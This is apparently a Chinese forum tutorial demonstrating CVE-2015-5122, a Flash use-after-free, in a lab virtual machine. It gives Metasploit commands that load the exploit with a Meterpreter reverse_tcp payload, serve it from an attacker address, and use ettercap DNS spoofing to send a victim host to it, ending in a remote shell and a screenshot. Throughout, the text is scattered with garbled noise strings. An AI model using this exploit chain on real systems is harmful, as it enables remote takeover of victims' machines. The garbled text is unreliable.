cve2015-5122漏洞实例演示虚拟机

admin

7 x' e4 Y$ C. `$ m 二、cve2015-5122漏洞实例演示虚拟机

+ w' s; ~& l! i6 t6 I7 T& F

1 k0 }. V! b" q) {& c$ e$ f   关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 5 B/ R/ L' |! D- ~, V9 H5 B

search cve-2015-5122如图：

$ d5 P }) J! L! \- w+ X: n" f" }6 A

  7 O# d" F$ ?4 [$ Q. G8 B

S x# n, d" ?6 z" S' i% y' E

) W7 `3 O/ O2 Y- W5 i3 r) c# B- l 下面我们敲如下命令： 2 |# \' V* @! y8 j* `

use exploit/multi/browser/adobe_flash_opaque_background_uaf

set PAYLOAD windows/meterpreter/reverse_tcp

* ^; X; j. Z+ f: _! p8 D set LHOST 192.168.0.109 / @& ^: |# _3 ]' D% Z$ [6 K8 a2 ]7 A

6 M( d0 y! t) z; P4 v5 x

% J# U& l9 u9 i" Q9 j; M set URIPATH /                        /*根目录*/ ; @2 j5 L0 d$ }, i. J% Q

6 G! W) R/ [- j3 ^6 {

7 W$ R( I5 c% B! O set SRVHOST 192.168.0.109  //192.168.0.109为kaili ip地址 3 A* F8 `! ^2 X3 X: m7 J: X5 S9 S

. Q- U" Y$ s( t0 J- }

set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用

6 a* e6 o* M3 d( d% Y9 A1 M6 _ 然后show options如图： ; k6 D, M0 W( Q+ a5 [6 q5 n

7 R; x- x! m j, C8 a1 }

9 @4 n: m# H: h# G4 }, `   4 {) e* {( D# e. d) s2 Y7 s

& _3 Y/ b3 L! { c2 a3 B8 z, n

* \. R8 L) Z" P( P* H& b 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：

& |4 m4 f# s4 o& t7 `' G Z( W6 b 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 1 m+ A$ Z- M; Y' n0 p

# a1 H' e- i d0 I. U+ R/ o4 [" J0 N Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf $ `, }% A3 `) |3 @: ?

/ \5 |: U, B( k9 ?

8 t% p$ W/ n1 P/ i+ s) N) s( W   6 x: g: N; T* R

# I( q) S/ y* c5 ~% D/ I) e

7 h; A3 k4 q8 F2 ~! [7 n 成功了，这时候我们断开ettercap，如图： ' K' ~! T; i. z: F9 ]' t

2 J, a" y5 @- M9 g

 

' z, `2 k! v% F+ v' w

Screenshot如图： ' c& p/ s* S" C

- r3 x- k6 j5 \' Y7 y! q- d* ]8 ?

 

8 D- q, y5 W1 g( @+ {

* Q. E5 U. o7 j6 `